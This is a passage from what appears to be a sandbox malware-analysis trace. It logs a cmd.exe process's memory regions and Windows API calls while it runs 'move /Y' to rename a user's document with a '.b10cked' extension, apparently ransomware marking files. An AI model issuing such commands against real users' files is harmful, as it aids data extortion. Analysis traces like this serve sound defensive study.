\"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13684 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13685 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13686 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13687 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 13688 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13689 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13690 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13691 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13692 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 13693 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14059 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14060 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14061 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14062 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 14063 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 14064 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14065 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14066 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14067 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14068 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14069 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14070 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14071 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14072 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14137 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 14138 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14139 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14140 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 14141 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 14142 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 14143 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14144 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 14145 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 14146 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 196 os_tid = 0xbec [0136.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fdcc | out: lpSystemTimeAsFileTime=0x24fdcc*(dwLowDateTime=0x8b2ee500, dwHighDateTime=0x1d440a9)) [0136.310] GetCurrentProcessId () returned 0xc38 [0136.310] GetCurrentThreadId () returned 0xbec [0136.310] GetTickCount () returned 0x2b163 [0136.310] QueryPerformanceCounter (in: lpPerformanceCount=0x24fdc4 | out: lpPerformanceCount=0x24fdc4*=19309956965) returned 1 [0136.311] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.311] __set_app_type (_Type=0x1) [0136.311] __p__fmode () returned 0x76b331f4 [0136.311] __p__commode () returned 0x76b331fc [0136.311] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.311] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.311] GetCurrentThreadId () returned 0xbec [0136.312] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbec) returned 0x38 [0136.312] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.312] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.312] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.324] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.324] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fd5c | out: phkResult=0x24fd5c*=0x0) returned 0x2 [0136.324] VirtualQuery (in: lpAddress=0x24fd93, lpBuffer=0x24fd2c, dwLength=0x1c | out: lpBuffer=0x24fd2c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fd2c, dwLength=0x1c | out: lpBuffer=0x24fd2c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fd2c, dwLength=0x1c | out: lpBuffer=0x24fd2c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fd2c, dwLength=0x1c | out: lpBuffer=0x24fd2c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fd2c, dwLength=0x1c | out: lpBuffer=0x24fd2c*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.324] GetConsoleOutputCP () returned 0x1b5 [0136.326] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.326] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.327] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.327] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.329] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.331] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.331] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.332] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.332] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.358] GetEnvironmentStringsW () returned 0x350180* [0136.358] FreeEnvironmentStringsW (penv=0x350180) returned 1 [0136.358] GetEnvironmentStringsW () returned 0x350180* [0136.359] FreeEnvironmentStringsW (penv=0x350180) returned 1 [0136.359] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eccc | out: phkResult=0x24eccc*=0x40) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x0, lpData=0x24ecd8*=0xa8, lpcbData=0x24ecd0*=0x1000) returned 0x2 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x1, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x0, lpData=0x24ecd8*=0x1, lpcbData=0x24ecd0*=0x1000) returned 0x2 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x0, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x40, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x40, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x0, lpData=0x24ecd8*=0x40, lpcbData=0x24ecd0*=0x1000) returned 0x2 [0136.359] RegCloseKey (hKey=0x40) returned 0x0 [0136.359] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eccc | out: phkResult=0x24eccc*=0x40) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x0, lpData=0x24ecd8*=0x40, lpcbData=0x24ecd0*=0x1000) returned 0x2 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x1, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x0, lpData=0x24ecd8*=0x1, lpcbData=0x24ecd0*=0x1000) returned 0x2 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x0, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x9, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x4, lpData=0x24ecd8*=0x9, lpcbData=0x24ecd0*=0x4) returned 0x0 [0136.359] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ecd4, lpData=0x24ecd8, lpcbData=0x24ecd0*=0x1000 | out: lpType=0x24ecd4*=0x0, lpData=0x24ecd8*=0x9, lpcbData=0x24ecd0*=0x1000) returned 0x2 [0136.359] RegCloseKey (hKey=0x40) returned 0x0 [0136.360] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.360] srand (_Seed=0x5b88636a) [0136.360] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked\"" [0136.360] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MMOP~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\M9MmOpgceUJDVTGEEh.docx.b10cked\"" [0136.360] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.360] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3518e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.360] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.360] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.360] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.360] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.360] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.360] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.360] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.360] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.361] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.361] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.361] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.361] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.361] GetEnvironmentStringsW () returned 0x3522d0* [0136.361] FreeEnvironmentStringsW (penv=0x3522d0) returned 1 [0136.361] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.361] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.361] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.361] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.361] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.361] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.361] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.361] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.361] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.361] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.361] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fa98 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.361] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fa98, lpFilePart=0x24fa94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fa94*="Desktop") returned 0x18 [0136.361] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.361] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f814 | out: lpFindFileData=0x24f814) returned 0x350010 [0136.362] FindClose (in: hFindFile=0x350010 | out: hFindFile=0x350010) returned 1 [0136.362] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f814 | out: lpFindFileData=0x24f814) returned 0x350010 [0136.362] FindClose (in: hFindFile=0x350010 | out: hFindFile=0x350010) returned 1 [0136.362] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f814 | out: lpFindFileData=0x24f814) returned 0x350010 [0136.362] FindClose (in: hFindFile=0x350010 | out: hFindFile=0x350010) returned 1 [0136.362] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.362] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.362] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.362] GetEnvironmentStringsW () returned 0x352af0* [0136.363] FreeEnvironmentStringsW (penv=0x352af0) returned 1 [0136.363] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.363] GetConsoleOutputCP () returned 0x1b5 [0136.370] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.370] GetUserDefaultLCID () returned 0x409 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fbd8, cchData=128 | out: lpLCData="0") returned 2 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fbd8, cchData=128 | out: lpLCData="0") returned 2 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fbd8, cchData=128 | out: lpLCData="1") returned 2 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.380] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.381] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.381] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.382] GetConsoleTitleW (in: lpConsoleTitle=0x3408e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.408] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.408] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.408] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.408] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.409] _wcsicmp (_String1="move", _String2=")") returned 68 [0136.409] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0136.409] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0136.409] _wcsicmp (_String1="IF", _String2="move") returned -4 [0136.409] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0136.409] _wcsicmp (_String1="REM", _String2="move") returned 5 [0136.409] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0136.412] GetConsoleTitleW (in: lpConsoleTitle=0x24f8d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.446] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0136.446] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0136.446] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0136.446] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0136.446] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0136.446] _wcsicmp (_String1="move", _String2="CD") returned 10 [0136.446] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0136.446] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0136.446] _wcsicmp (_String1="move", _String2="REN") returned -5 [0136.446] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0136.446] _wcsicmp (_String1="move", _String2="SET") returned -6 [0136.446] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0136.446] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0136.446] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0136.446] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0136.446] _wcsicmp (_String1="move", _String2="MD") returned 11 [0136.446] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0136.446] _wcsicmp (_String1="move", _String2="RD") returned -5 [0136.446] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0136.446] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0136.446] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0136.446] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0136.446] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0136.446] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0136.446] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0136.446] _wcsicmp (_String1="move", _String2="VER") returned -9 [0136.446] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0136.446] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0136.446] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0136.446] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0136.446] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0136.446] _wcsicmp (_String1="move", _String2="START") returned -6 [0136.446] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0136.446] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0136.446] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0136.448] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.448] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.448] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f68c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f684, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f684*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.448] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.448] _wcsnicmp 